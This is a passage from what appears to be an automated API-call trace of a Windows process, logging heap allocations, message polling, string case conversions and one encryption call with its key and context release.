(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.270] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.273] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.274] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0200.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.274] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a5508*, pdwDataLen=0x8bef68*=0x1a51, dwBufLen=0x1a58 | out: pbData=0x34a5508*, pdwDataLen=0x8bef68*=0x1a58) returned 1 [0200.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0200.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0200.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0200.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0200.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01a0 [0200.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0190 [0200.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01e0 [0200.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0200.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01d0 [0200.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0200.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0200.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.276] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01a0 [0200.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0200.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0190 [0200.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.276] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0200.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0200.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0200.276] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.276] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0200.276] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0200.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0200.277] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0200.277] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0200.277] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0200.277] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.277] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0200.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0200.277] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0200.277] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.277] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0200.278] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.278] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.278] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.278] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.278] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.278] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.278] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.278] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.278] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.278] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.278] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.278] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.278] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.278] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.278] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.280] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.280] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.280] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0200.280] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.280] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0200.280] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.280] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.280] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.280] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0200.280] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.280] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0200.280] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0200.280] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.281] CryptDestroyKey (hKey=0xaa5860) returned 1 [0200.281] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.281] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.281] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0200.281] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.281] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0200.281] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.281] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.281] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0200.281] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.281] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0200.281] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.281] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.281] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.281] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.281] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.281] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0200.281] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.282] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0200.282] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0200.282] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.282] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.282] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.282] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.282] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.282] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0200.282] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.282] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0200.282] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.282] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.282] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0200.282] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.282] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0200.282] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.282] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.282] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.282] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.282] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.283] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.283] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.283] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.283] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.283] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.283] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.283] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.283] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.283] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.283] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.283] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0200.283] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.283] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0200.283] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.283] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.283] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.283] CryptReleaseContext (hProv=0xad63f8, dwFlags=0x0) returned 1 [0200.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0200.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0200.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0200.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0200.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0200.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0200.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0200.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0200.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0200.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0200.286] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.286] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0200.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.286] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.286] CharUpperBuffW (in: lpsz="SSA5000A03A10", 